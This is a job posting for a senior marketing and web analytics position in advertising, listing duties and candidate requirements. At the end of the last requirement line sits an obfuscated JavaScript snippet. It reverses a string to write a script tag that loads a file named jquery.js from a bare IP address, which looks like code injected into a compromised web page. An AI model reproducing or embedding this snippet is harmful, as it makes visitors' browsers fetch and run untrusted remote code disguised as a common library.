Industry : Advertising
• Collaborate with Strategic Consultants, Account Planners and account leads and clients before, during and after all marketing plans are deployed, ensuring proper metrics are set up, data is collected succinctly, and results are converted into insights with a clear action plan.
• Develop web tracking strategies for websites across a number of clients.
• Provide campaign reporting and deep-dive web analytics, producing tracking reports and end of campaign / activity reports.
• Develop and manage client online reporting dashboards and be responsible for communicating best practice to the team.
• Develop and execute campaign measurement and analysis, test designs, ad-hoc analysis, and present conclusions to clients and account teams.
• Participate in client management and relationship opportunities.
• Collaborate with client team and internal teams (marketing analytics, account management, interactive strategy) to socialize findings to improve campaign performance and user experience.
• Provide guidance to analysts and senior analysts where required.
• Present findings to both internal and client teams with confidence and insightful analysis.
• Work with account team to develop marketing measurement solutions comprising defining measurement strategy, vision, and requirements needs to support business objectives and improve decision making processes.
• Gather business requirements and identifies measures, approaches and methodologies for measuring success against objectives.
• Design and generates frameworks that provide insight to the success of digital marketing programs.
• Bachelors Degree in Economics, Finance, Statistics, or Mathematics or related, masters degree preferred
• 3-5 years experience in marketing analysis, database marketing and/or research
• Direct experience or advanced education in business or quantitative analysis including both offline and online/interactive businesses
• Able to manage, delegate, and assign complex projects and timelines
• Strong analytic skills, preferably in the marketing field
• Impeccable attention to detail and very strong ability to convert complex data into insights and action plans.
• Keen ability to visualize data through graphing/ charting/ information display skills (strong Power Point skills are essential)
• Excellent written, verbal and presentation skills are needed along with top-tier communication and listening skills document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))